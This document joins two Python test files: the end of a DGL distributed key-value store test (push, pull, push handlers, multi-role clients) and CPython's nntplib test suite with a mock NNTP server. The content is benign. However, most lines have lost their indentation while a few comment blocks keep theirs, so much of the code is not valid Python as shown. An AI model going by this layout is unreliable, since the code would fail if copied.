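# Hedged sketch of the push-handler protocol above: a handler receives the
# server-side storage dict, the data name, the target row ids, and the pushed
# tensor, and mutates the stored rows in place. scaled_add_push is purely
# illustrative and is not registered by any test below.
def scaled_add_push(target, name, id_tensor, data_tensor):
    # accumulate half of each pushed update into the stored rows
    target[name][id_tensor] += data_tensor * 0.5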
@unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Windows and TensorFlow are not supported yet')
def test_partition_policy():
assert node_policy.policy_str == 'node'
assert edge_policy.policy_str == 'edge'
assert node_policy.part_id == 0
assert edge_policy.part_id == 0
local_nid = node_policy.to_local(F.tensor([0,1,2,3,4,5]))
local_eid = edge_policy.to_local(F.tensor([0,1,2,3,4,5,6]))
assert_array_equal(F.asnumpy(local_nid), F.asnumpy(F.tensor([0,1,2,3,4,5], F.int64)))
assert_array_equal(F.asnumpy(local_eid), F.asnumpy(F.tensor([0,1,2,3,4,5,6], F.int64)))
nid_partid = node_policy.to_partid(F.tensor([0,1,2,3,4,5], F.int64))
eid_partid = edge_policy.to_partid(F.tensor([0,1,2,3,4,5,6], F.int64))
assert_array_equal(F.asnumpy(nid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0], F.int64)))
assert_array_equal(F.asnumpy(eid_partid), F.asnumpy(F.tensor([0,0,0,0,0,0,0], F.int64)))
assert node_policy.get_data_size() == len(node_map)
assert edge_policy.get_data_size() == len(edge_map)
def start_server(server_id, num_clients):
# Init kvserver
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
kvserver = dgl.distributed.KVServer(server_id=server_id,
ip_config='kv_ip_config.txt',
num_clients=num_clients)
kvserver.add_part_policy(node_policy)
kvserver.add_part_policy(edge_policy)
if kvserver.is_backup_server():
kvserver.init_data('data_0', 'node')
kvserver.init_data('data_0_1', 'node')
kvserver.init_data('data_0_2', 'node')
kvserver.init_data('data_0_3', 'node')
else:
kvserver.init_data('data_0', 'node', data_0)
kvserver.init_data('data_0_1', 'node', data_0_1)
kvserver.init_data('data_0_2', 'node', data_0_2)
kvserver.init_data('data_0_3', 'node', data_0_3)
# start server
server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None)
dgl.distributed.start_server(server_id=server_id,
ip_config='kv_ip_config.txt',
num_clients=num_clients,
server_state=server_state)
def start_server_mul_role(server_id, num_clients):
# Init kvserver
kvserver = dgl.distributed.KVServer(server_id=server_id,
ip_config='kv_ip_mul_config.txt',
num_clients=num_clients)
kvserver.add_part_policy(node_policy)
if kvserver.is_backup_server():
kvserver.init_data('data_0', 'node')
else:
kvserver.init_data('data_0', 'node', data_0)
# start server
server_state = dgl.distributed.ServerState(kv_store=kvserver, local_g=None, partition_book=None)
dgl.distributed.start_server(server_id=server_id,
ip_config='kv_ip_mul_config.txt',
num_clients=num_clients,
server_state=server_state)
def start_client(num_clients):
    # Note: clients must connect to the server before creating a KVClient.
dgl.distributed.connect_to_server(ip_config='kv_ip_config.txt')
# Init kvclient
kvclient = dgl.distributed.KVClient(ip_config='kv_ip_config.txt')
assert dgl.distributed.get_num_client() == num_clients
kvclient.init_data(name='data_1',
shape=F.shape(data_1),
dtype=F.dtype(data_1),
part_policy=edge_policy,
init_func=init_zero_func)
kvclient.init_data(name='data_2',
shape=F.shape(data_2),
dtype=F.dtype(data_2),
part_policy=node_policy,
init_func=init_zero_func)
kvclient.map_shared_data(partition_book=gpb)
# Test data_name_list
name_list = kvclient.data_name_list()
print(name_list)
assert 'data_0' in name_list
assert 'data_0_1' in name_list
assert 'data_0_2' in name_list
assert 'data_0_3' in name_list
assert 'data_1' in name_list
assert 'data_2' in name_list
# Test get_meta_data
meta = kvclient.get_data_meta('data_0')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0)
assert shape == F.shape(data_0)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_0_1')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0_1)
assert shape == F.shape(data_0_1)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_0_2')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0_2)
assert shape == F.shape(data_0_2)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_0_3')
dtype, shape, policy = meta
assert dtype == F.dtype(data_0_3)
assert shape == F.shape(data_0_3)
assert policy.policy_str == 'node'
meta = kvclient.get_data_meta('data_1')
dtype, shape, policy = meta
assert dtype == F.dtype(data_1)
assert shape == F.shape(data_1)
assert policy.policy_str == 'edge'
meta = kvclient.get_data_meta('data_2')
dtype, shape, policy = meta
assert dtype == F.dtype(data_2)
assert shape == F.shape(data_2)
assert policy.policy_str == 'node'
# Test push and pull
id_tensor = F.tensor([0,2,4], F.int64)
data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32)
kvclient.push(name='data_0',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_1',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_2',
id_tensor=id_tensor,
data_tensor=data_tensor)
res = kvclient.pull(name='data_0', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_1', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_2', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
# Register new push handler
kvclient.register_push_handler('data_0', udf_push)
kvclient.register_push_handler('data_1', udf_push)
kvclient.register_push_handler('data_2', udf_push)
# Test push and pull
kvclient.push(name='data_0',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_1',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.push(name='data_2',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.barrier()
data_tensor = data_tensor * data_tensor
res = kvclient.pull(name='data_0', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_1', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
res = kvclient.pull(name='data_2', id_tensor=id_tensor)
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
# Test delete data
kvclient.delete_data('data_0')
kvclient.delete_data('data_1')
kvclient.delete_data('data_2')
    # Create new data and register an additive push handler
kvclient.init_data(name='data_3',
shape=F.shape(data_2),
dtype=F.dtype(data_2),
part_policy=node_policy,
init_func=init_zero_func)
kvclient.register_push_handler('data_3', add_push)
kvclient.map_shared_data(partition_book=gpb)
data_tensor = F.tensor([[6.,6.],[6.,6.],[6.,6.]], F.float32)
kvclient.barrier()
time.sleep(kvclient.client_id + 1)
print("add...")
kvclient.push(name='data_3',
id_tensor=id_tensor,
data_tensor=data_tensor)
kvclient.barrier()
res = kvclient.pull(name='data_3', id_tensor=id_tensor)
data_tensor = data_tensor * num_clients
assert_array_equal(F.asnumpy(res), F.asnumpy(data_tensor))
def start_client_mul_role(i, num_clients):
    # Note: clients must connect to the server before creating a KVClient.
dgl.distributed.connect_to_server(ip_config='kv_ip_mul_config.txt')
# Init kvclient
if i % 2 == 0:
kvclient = dgl.distributed.KVClient(ip_config='kv_ip_mul_config.txt', role='trainer')
else:
kvclient = dgl.distributed.KVClient(ip_config='kv_ip_mul_config.txt', role='sampler')
if i == 2: # block one trainer
time.sleep(5)
kvclient.barrier()
print("i: %d role: %s" % (i, kvclient.role))
@unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Windows and TensorFlow are not supported yet')
def test_kv_store():
ip_config = open("kv_ip_config.txt", "w")
num_servers = 2
num_clients = 2
ip_addr = get_local_usable_addr()
ip_config.write('{} {}\n'.format(ip_addr, num_servers))
ip_config.close()
ctx = mp.get_context('spawn')
pserver_list = []
pclient_list = []
for i in range(num_servers):
pserver = ctx.Process(target=start_server, args=(i, num_clients))
pserver.start()
pserver_list.append(pserver)
for i in range(num_clients):
pclient = ctx.Process(target=start_client, args=(num_clients,))
pclient.start()
pclient_list.append(pclient)
for i in range(num_clients):
pclient_list[i].join()
for i in range(num_servers):
pserver_list[i].join()
@unittest.skipIf(os.name == 'nt' or os.getenv('DGLBACKEND') == 'tensorflow', reason='Windows and TensorFlow are not supported yet')
def test_kv_multi_role():
ip_config = open("kv_ip_mul_config.txt", "w")
num_servers = 2
num_clients = 10
ip_addr = get_local_usable_addr()
ip_config.write('{} {}\n'.format(ip_addr, num_servers))
ip_config.close()
ctx = mp.get_context('spawn')
pserver_list = []
pclient_list = []
for i in range(num_servers):
pserver = ctx.Process(target=start_server_mul_role, args=(i, num_clients))
pserver.start()
pserver_list.append(pserver)
for i in range(num_clients):
pclient = ctx.Process(target=start_client_mul_role, args=(i, num_clients))
pclient.start()
pclient_list.append(pclient)
for i in range(num_clients):
pclient_list[i].join()
for i in range(num_servers):
pserver_list[i].join()
if __name__ == '__main__':
test_partition_policy()
test_kv_store()
test_kv_multi_role()
|
test_nntplib.py
|
import io
import socket
import datetime
import textwrap
import unittest
import functools
import contextlib
import os.path
import re
import threading
from test import support
from test.support import socket_helper
from nntplib import NNTP, GroupInfo
import nntplib
from unittest.mock import patch
try:
import ssl
except ImportError:
ssl = None
certfile = os.path.join(os.path.dirname(__file__), 'keycert3.pem')
if ssl is not None:
SSLError = ssl.SSLError
else:
class SSLError(Exception):
"""Non-existent exception class when we lack SSL support."""
reason = "This will never be raised."
# TODO:
# - test the `file` arg to more commands
# - test error conditions
# - test auth and `usenetrc`
class NetworkedNNTPTestsMixin:
def test_welcome(self):
welcome = self.server.getwelcome()
self.assertEqual(str, type(welcome))
def test_help(self):
resp, lines = self.server.help()
self.assertTrue(resp.startswith("100 "), resp)
for line in lines:
self.assertEqual(str, type(line))
def test_list(self):
resp, groups = self.server.list()
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_list_active(self):
resp, groups = self.server.list(self.GROUP_PAT)
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_unknown_command(self):
with self.assertRaises(nntplib.NNTPPermanentError) as cm:
self.server._shortcmd("XYZZY")
resp = cm.exception.response
self.assertTrue(resp.startswith("500 "), resp)
def test_newgroups(self):
# gmane gets a constant influx of new groups. In order not to stress
# the server too much, we choose a recent date in the past.
dt = datetime.date.today() - datetime.timedelta(days=7)
resp, groups = self.server.newgroups(dt)
if len(groups) > 0:
self.assertIsInstance(groups[0], GroupInfo)
self.assertIsInstance(groups[0].group, str)
def test_description(self):
def _check_desc(desc):
# Sanity checks
self.assertIsInstance(desc, str)
self.assertNotIn(self.GROUP_NAME, desc)
desc = self.server.description(self.GROUP_NAME)
_check_desc(desc)
# Another sanity check
self.assertIn("Python", desc)
# With a pattern
desc = self.server.description(self.GROUP_PAT)
_check_desc(desc)
# Shouldn't exist
desc = self.server.description("zk.brrtt.baz")
self.assertEqual(desc, '')
def test_descriptions(self):
resp, descs = self.server.descriptions(self.GROUP_PAT)
# 215 for LIST NEWSGROUPS, 282 for XGTITLE
self.assertTrue(
resp.startswith("215 ") or resp.startswith("282 "), resp)
self.assertIsInstance(descs, dict)
desc = descs[self.GROUP_NAME]
self.assertEqual(desc, self.server.description(self.GROUP_NAME))
def test_group(self):
result = self.server.group(self.GROUP_NAME)
self.assertEqual(5, len(result))
resp, count, first, last, group = result
self.assertEqual(group, self.GROUP_NAME)
self.assertIsInstance(count, int)
self.assertIsInstance(first, int)
self.assertIsInstance(last, int)
self.assertLessEqual(first, last)
self.assertTrue(resp.startswith("211 "), resp)
def test_date(self):
resp, date = self.server.date()
self.assertIsInstance(date, datetime.datetime)
# Sanity check
self.assertGreaterEqual(date.year, 1995)
self.assertLessEqual(date.year, 2030)
def _check_art_dict(self, art_dict):
# Some sanity checks for a field dictionary returned by OVER / XOVER
self.assertIsInstance(art_dict, dict)
# NNTP has 7 mandatory fields
self.assertGreaterEqual(art_dict.keys(),
{"subject", "from", "date", "message-id",
"references", ":bytes", ":lines"}
)
for v in art_dict.values():
self.assertIsInstance(v, (str, type(None)))
def test_xover(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xover(last - 5, last)
if len(lines) == 0:
self.skipTest("no articles retrieved")
# The 'last' article is not necessarily part of the output (cancelled?)
art_num, art_dict = lines[0]
self.assertGreaterEqual(art_num, last - 5)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
@unittest.skipIf(True, 'temporarily skipped until a permanent solution'
' is found for issue #28971')
def test_over(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
start = last - 10
# The "start-" article range form
resp, lines = self.server.over((start, None))
art_num, art_dict = lines[0]
self._check_art_dict(art_dict)
# The "start-end" article range form
resp, lines = self.server.over((start, last))
art_num, art_dict = lines[-1]
# The 'last' article is not necessarily part of the output (cancelled?)
self.assertGreaterEqual(art_num, start)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
# XXX The "message_id" form is unsupported by gmane
# 503 Overview by message-ID unsupported
def test_xhdr(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xhdr('subject', last)
for line in lines:
self.assertEqual(str, type(line[1]))
def check_article_resp(self, resp, article, art_num=None):
self.assertIsInstance(article, nntplib.ArticleInfo)
if art_num is not None:
self.assertEqual(article.number, art_num)
for line in article.lines:
self.assertIsInstance(line, bytes)
# XXX this could exceptionally happen...
self.assertNotIn(article.lines[-1], (b".", b".\n", b".\r\n"))
@unittest.skipIf(True, "FIXME: see bpo-32128")
def test_article_head_body(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
# Try to find an available article
for art_num in (last, first, last - 1):
try:
resp, head = self.server.head(art_num)
except nntplib.NNTPTemporaryError as e:
if not e.response.startswith("423 "):
raise
# "423 No such article" => choose another one
continue
break
else:
self.skipTest("could not find a suitable article number")
self.assertTrue(resp.startswith("221 "), resp)
self.check_article_resp(resp, head, art_num)
resp, body = self.server.body(art_num)
self.assertTrue(resp.startswith("222 "), resp)
self.check_article_resp(resp, body, art_num)
resp, article = self.server.article(art_num)
self.assertTrue(resp.startswith("220 "), resp)
self.check_article_resp(resp, article, art_num)
        # Tolerate running the tests from behind an NNTP virus checker
        def blacklist(line):
            return line.startswith(b'X-Antivirus')
filtered_head_lines = [line for line in head.lines
if not blacklist(line)]
filtered_lines = [line for line in article.lines
if not blacklist(line)]
self.assertEqual(filtered_lines, filtered_head_lines + [b''] + body.lines)
def test_capabilities(self):
# The server under test implements NNTP version 2 and has a
# couple of well-known capabilities. Just sanity check that we
# got them.
def _check_caps(caps):
caps_list = caps['LIST']
self.assertIsInstance(caps_list, (list, tuple))
self.assertIn('OVERVIEW.FMT', caps_list)
self.assertGreaterEqual(self.server.nntp_version, 2)
_check_caps(self.server.getcapabilities())
# This re-emits the command
resp, caps = self.server.capabilities()
_check_caps(caps)
def test_zlogin(self):
# This test must be the penultimate because further commands will be
# refused.
baduser = "notarealuser"
badpw = "notarealpassword"
# Check that bogus credentials cause failure
self.assertRaises(nntplib.NNTPError, self.server.login,
user=baduser, password=badpw, usenetrc=False)
# FIXME: We should check that correct credentials succeed, but that
# would require valid details for some server somewhere to be in the
# test suite, I think. Gmane is anonymous, at least as used for the
# other tests.
def test_zzquit(self):
# This test must be called last, hence the name
cls = type(self)
try:
self.server.quit()
finally:
cls.server = None
@classmethod
def wrap_methods(cls):
# Wrap all methods in a transient_internet() exception catcher
# XXX put a generic version in test.support?
def wrap_meth(meth):
@functools.wraps(meth)
def wrapped(self):
with socket_helper.transient_internet(self.NNTP_HOST):
meth(self)
return wrapped
for name in dir(cls):
if not name.startswith('test_'):
continue
meth = getattr(cls, name)
if not callable(meth):
continue
# Need to use a closure so that meth remains bound to its current
# value
setattr(cls, name, wrap_meth(meth))
def test_timeout(self):
with self.assertRaises(ValueError):
self.NNTP_CLASS(self.NNTP_HOST, timeout=0, usenetrc=False)
def test_with_statement(self):
def is_connected():
if not hasattr(server, 'file'):
return False
try:
server.help()
except (OSError, EOFError):
return False
return True
try:
server = self.NNTP_CLASS(self.NNTP_HOST,
timeout=support.INTERNET_TIMEOUT,
usenetrc=False)
with server:
self.assertTrue(is_connected())
self.assertTrue(server.help())
self.assertFalse(is_connected())
server = self.NNTP_CLASS(self.NNTP_HOST,
timeout=support.INTERNET_TIMEOUT,
usenetrc=False)
with server:
server.quit()
self.assertFalse(is_connected())
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"Got {ssl_err} connecting "
f"to {self.NNTP_HOST!r}")
raise
NetworkedNNTPTestsMixin.wrap_methods()
EOF_ERRORS = (EOFError,)
if ssl is not None:
EOF_ERRORS += (ssl.SSLEOFError,)
class NetworkedNNTPTests(NetworkedNNTPTestsMixin, unittest.TestCase):
# This server supports STARTTLS (gmane doesn't)
NNTP_HOST = 'news.trigofacile.com'
GROUP_NAME = 'fr.comp.lang.python'
GROUP_PAT = 'fr.comp.lang.*'
NNTP_CLASS = NNTP
@classmethod
def setUpClass(cls):
support.requires("network")
with socket_helper.transient_internet(cls.NNTP_HOST):
try:
cls.server = cls.NNTP_CLASS(cls.NNTP_HOST,
timeout=support.INTERNET_TIMEOUT,
usenetrc=False)
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"{cls} got {ssl_err} connecting "
f"to {cls.NNTP_HOST!r}")
raise
except EOF_ERRORS:
raise unittest.SkipTest(f"{cls} got EOF error on connecting "
f"to {cls.NNTP_HOST!r}")
@classmethod
def tearDownClass(cls):
if cls.server is not None:
cls.server.quit()
@unittest.skipUnless(ssl, 'requires SSL support')
class NetworkedNNTP_SSLTests(NetworkedNNTPTests):
# Technical limits for this public NNTP server (see http://www.aioe.org):
# "Only two concurrent connections per IP address are allowed and
# 400 connections per day are accepted from each IP address."
NNTP_HOST = 'nntp.aioe.org'
GROUP_NAME = 'comp.lang.python'
GROUP_PAT = 'comp.lang.*'
NNTP_CLASS = getattr(nntplib, 'NNTP_SSL', None)
# Disabled as it produces too much data
test_list = None
# Disabled as the connection will already be encrypted.
test_starttls = None
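# Hedged note: assigning None over an inherited test (as test_list and
# test_starttls above) is a common stdlib idiom for disabling a single
# inherited test; unittest's loader only collects attributes that are
# callable.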
#
# Non-networked tests using a local server (or something mocking it).
#
class _NNTPServerIO(io.RawIOBase):
"""A raw IO object allowing NNTP commands to be received and processed
by a handler. The handler can push responses which can then be read
from the IO object."""
def __init__(self, handler):
io.RawIOBase.__init__(self)
# The channel from the client
self.c2s = io.BytesIO()
# The channel to the client
self.s2c = io.BytesIO()
self.handler = handler
self.handler.start(self.c2s.readline, self.push_data)
def readable(self):
return True
def writable(self):
return True
def push_data(self, data):
"""Push (buffer) some data to send to the client."""
pos = self.s2c.tell()
self.s2c.seek(0, 2)
self.s2c.write(data)
self.s2c.seek(pos)
def write(self, b):
"""The client sends us some data"""
pos = self.c2s.tell()
self.c2s.write(b)
self.c2s.seek(pos)
self.handler.process_pending()
return len(b)
def readinto(self, buf):
"""The client wants to read a response"""
self.handler.process_pending()
b = self.s2c.read(len(buf))
n = len(b)
buf[:n] = b
return n
def make_mock_file(handler):
sio = _NNTPServerIO(handler)
# Using BufferedRWPair instead of BufferedRandom ensures the file
# isn't seekable.
file = io.BufferedRWPair(sio, sio)
return (sio, file)
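# Hedged sketch of how the mock plumbing is wired together (the real tests do
# this in MockedNNTPTestsMixin.make_server below): attach a handler to an
# in-memory _NNTPServerIO pair, then let nntplib._NNTPBase speak NNTP over it
# as if it were a socket file. handler_class is any handler class below.
def make_loopback_server(handler_class, hostname='test.server'):
    handler = handler_class()
    sio, file = make_mock_file(handler)
    server = nntplib._NNTPBase(file, hostname)
    return handler, sio, server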
class MockedNNTPTestsMixin:
# Override in derived classes
handler_class = None
def setUp(self):
super().setUp()
self.make_server()
def tearDown(self):
super().tearDown()
del self.server
def make_server(self, *args, **kwargs):
self.handler = self.handler_class()
self.sio, file = make_mock_file(self.handler)
self.server = nntplib._NNTPBase(file, 'test.server', *args, **kwargs)
return self.server
class MockedNNTPWithReaderModeMixin(MockedNNTPTestsMixin):
def setUp(self):
super().setUp()
self.make_server(readermode=True)
class NNTPv1Handler:
"""A handler for RFC 977"""
welcome = "200 NNTP mock server"
def start(self, readline, push_data):
self.in_body = False
self.allow_posting = True
self._readline = readline
self._push_data = push_data
self._logged_in = False
self._user_sent = False
# Our welcome
self.handle_welcome()
def _decode(self, data):
return str(data, "utf-8", "surrogateescape")
def process_pending(self):
if self.in_body:
while True:
line = self._readline()
if not line:
return
self.body.append(line)
if line == b".\r\n":
break
try:
meth, tokens = self.body_callback
meth(*tokens, body=self.body)
finally:
self.body_callback = None
self.body = None
self.in_body = False
while True:
line = self._decode(self._readline())
if not line:
return
if not line.endswith("\r\n"):
raise ValueError("line doesn't end with \\r\\n: {!r}".format(line))
line = line[:-2]
cmd, *tokens = line.split()
#meth = getattr(self.handler, "handle_" + cmd.upper(), None)
meth = getattr(self, "handle_" + cmd.upper(), None)
if meth is None:
self.handle_unknown()
else:
try:
meth(*tokens)
except Exception as e:
raise ValueError("command failed: {!r}".format(line)) from e
else:
if self.in_body:
self.body_callback = meth, tokens
self.body = []
def expect_body(self):
"""Flag that the client is expected to post a request body"""
self.in_body = True
def push_data(self, data):
"""Push some binary data"""
self._push_data(data)
def push_lit(self, lit):
"""Push a string literal"""
lit = textwrap.dedent(lit)
lit = "\r\n".join(lit.splitlines()) + "\r\n"
lit = lit.encode('utf-8')
self.push_data(lit)
def handle_unknown(self):
self.push_lit("500 What?")
def handle_welcome(self):
self.push_lit(self.welcome)
def handle_QUIT(self):
self.push_lit("205 Bye!")
def handle_DATE(self):
self.push_lit("111 20100914001155")
def handle_GROUP(self, group):
if group == "fr.comp.lang.python":
self.push_lit("211 486 761 1265 fr.comp.lang.python")
else:
self.push_lit("411 No such group {}".format(group))
def handle_HELP(self):
self.push_lit("""\
100 Legal commands
authinfo user Name|pass Password|generic <prog> <args>
date
help
Report problems to <root@example.org>
.""")
def handle_STAT(self, message_spec=None):
if message_spec is None:
self.push_lit("412 No newsgroup selected")
elif message_spec == "3000234":
self.push_lit("223 3000234 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("223 0 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
def handle_NEXT(self):
self.push_lit("223 3000237 <668929@example.org> retrieved")
def handle_LAST(self):
self.push_lit("223 3000234 <45223423@example.com> retrieved")
def handle_LIST(self, action=None, param=None):
if action is None:
self.push_lit("""\
215 Newsgroups in form "group high low flags".
comp.lang.python 0000052340 0000002828 y
comp.lang.python.announce 0000001153 0000000993 m
free.it.comp.lang.python 0000000002 0000000002 y
fr.comp.lang.python 0000001254 0000000760 y
free.it.comp.lang.python.learner 0000000000 0000000001 y
tw.bbs.comp.lang.python 0000000304 0000000304 y
.""")
elif action == "ACTIVE":
if param == "*distutils*":
self.push_lit("""\
215 Newsgroups in form "group high low flags"
gmane.comp.python.distutils.devel 0000014104 0000000001 m
gmane.comp.python.distutils.cvs 0000000000 0000000001 m
.""")
else:
self.push_lit("""\
215 Newsgroups in form "group high low flags"
.""")
elif action == "OVERVIEW.FMT":
self.push_lit("""\
215 Order of fields in overview database.
Subject:
From:
Date:
Message-ID:
References:
Bytes:
Lines:
Xref:full
.""")
elif action == "NEWSGROUPS":
assert param is not None
if param == "comp.lang.python":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python\tThe Python computer language.
.""")
elif param == "comp.lang.python*":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python.announce\tAnnouncements about the Python language. (Moderated)
comp.lang.python\tThe Python computer language.
.""")
else:
self.push_lit("""\
215 Descriptions in form "group description".
.""")
else:
self.push_lit('501 Unknown LIST keyword')
def handle_NEWNEWS(self, group, date_str, time_str):
# We hard code different return messages depending on passed
# argument and date syntax.
if (group == "comp.lang.python" and date_str == "20100913"
and time_str == "082004"):
# Date was passed in RFC 3977 format (NNTP "v2")
self.push_lit("""\
230 list of newsarticles (NNTP v2) created after Mon Sep 13 08:20:04 2010 follows
<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>
<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>
.""")
elif (group == "comp.lang.python" and date_str == "100913"
and time_str == "082004"):
# Date was passed in RFC 977 format (NNTP "v1")
self.push_lit("""\
230 list of newsarticles (NNTP v1) created after Mon Sep 13 08:20:04 2010 follows
<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>
<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>
.""")
elif (group == 'comp.lang.python' and
date_str in ('20100101', '100101') and
time_str == '090000'):
self.push_lit('too long line' * 3000 +
'\n.')
else:
self.push_lit("""\
230 An empty list of newsarticles follows
.""")
# (Note for experiments: many servers disable NEWNEWS.
# As of this writing, sicinfo3.epfl.ch doesn't.)
def handle_XOVER(self, message_spec):
if message_spec == "57-59":
self.push_lit(
"224 Overview information for 57-58 follows\n"
"57\tRe: ANN: New Plone book with strong Python (and Zope) themes throughout"
"\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>"
"\tSat, 19 Jun 2010 18:04:08 -0400"
"\t<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>"
"\t<hvalf7$ort$1@dough.gmane.org>\t7103\t16"
"\tXref: news.gmane.io gmane.comp.python.authors:57"
"\n"
"58\tLooking for a few good bloggers"
"\tDoug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>"
"\tThu, 22 Jul 2010 09:14:14 -0400"
"\t<A29863FA-F388-40C3-AA25-0FD06B09B5BF@gmail.com>"
"\t\t6683\t16"
"\t"
"\n"
# A UTF-8 overview line from fr.comp.lang.python
"59\tRe: Message d'erreur incompréhensible (par moi)"
"\tEric Brunel <eric.brunel@pragmadev.nospam.com>"
"\tWed, 15 Sep 2010 18:09:15 +0200"
"\t<eric.brunel-2B8B56.18091515092010@news.wanadoo.fr>"
"\t<4c90ec87$0$32425$ba4acef3@reader.news.orange.fr>\t1641\t27"
"\tXref: saria.nerim.net fr.comp.lang.python:1265"
"\n"
".\n")
else:
self.push_lit("""\
224 No articles
.""")
def handle_POST(self, *, body=None):
if body is None:
if self.allow_posting:
self.push_lit("340 Input article; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("440 Posting not permitted")
else:
assert self.allow_posting
self.push_lit("240 Article received OK")
self.posted_body = body
def handle_IHAVE(self, message_id, *, body=None):
if body is None:
if (self.allow_posting and
message_id == "<i.am.an.article.you.will.want@example.com>"):
self.push_lit("335 Send it; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("435 Article not wanted")
else:
assert self.allow_posting
self.push_lit("235 Article transferred OK")
self.posted_body = body
sample_head = """\
From: "Demo User" <nobody@example.net>
Subject: I am just a test article
Content-Type: text/plain; charset=UTF-8; format=flowed
Message-ID: <i.am.an.article.you.will.want@example.com>"""
sample_body = """\
This is just a test article.
..Here is a dot-starting line.
-- Signed by Andr\xe9."""
sample_article = sample_head + "\n\n" + sample_body
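    # Note: the doubled leading dot in sample_body above is NNTP dot-stuffing
    # (RFC 3977, section 3.1.1): a data line beginning with "." is sent as
    # ".." on the wire, and clients un-stuff it back to a single ".".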
def handle_ARTICLE(self, message_spec=None):
if message_spec is None:
self.push_lit("220 3000237 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("220 0 <45223423@example.com>")
elif message_spec == "3000234":
self.push_lit("220 3000234 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_article)
self.push_lit(".")
def handle_HEAD(self, message_spec=None):
if message_spec is None:
self.push_lit("221 3000237 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("221 0 <45223423@example.com>")
elif message_spec == "3000234":
self.push_lit("221 3000234 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_head)
self.push_lit(".")
def handle_BODY(self, message_spec=None):
if message_spec is None:
self.push_lit("222 3000237 <45223423@example.com>")
elif message_spec == "<45223423@example.com>":
self.push_lit("222 0 <45223423@example.com>")
elif message_spec == "3000234":
self.push_lit("222 3000234 <45223423@example.com>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_body)
self.push_lit(".")
def handle_AUTHINFO(self, cred_type, data):
if self._logged_in:
self.push_lit('502 Already Logged In')
elif cred_type == 'user':
if self._user_sent:
self.push_lit('482 User Credential Already Sent')
else:
self.push_lit('381 Password Required')
self._user_sent = True
elif cred_type == 'pass':
self.push_lit('281 Login Successful')
self._logged_in = True
else:
raise Exception('Unknown cred type {}'.format(cred_type))
class NNTPv2Handler(NNTPv1Handler):
"""A handler for RFC 3977 (NNTP "v2")"""
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1{}
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
READER
."""
if not self._logged_in:
self.push_lit(fmt.format('\n AUTHINFO USER'))
else:
self.push_lit(fmt.format(''))
def handle_MODE(self, _):
        raise Exception('MODE READER sent despite READER having been advertised')
def handle_OVER(self, message_spec=None):
return self.handle_XOVER(message_spec)
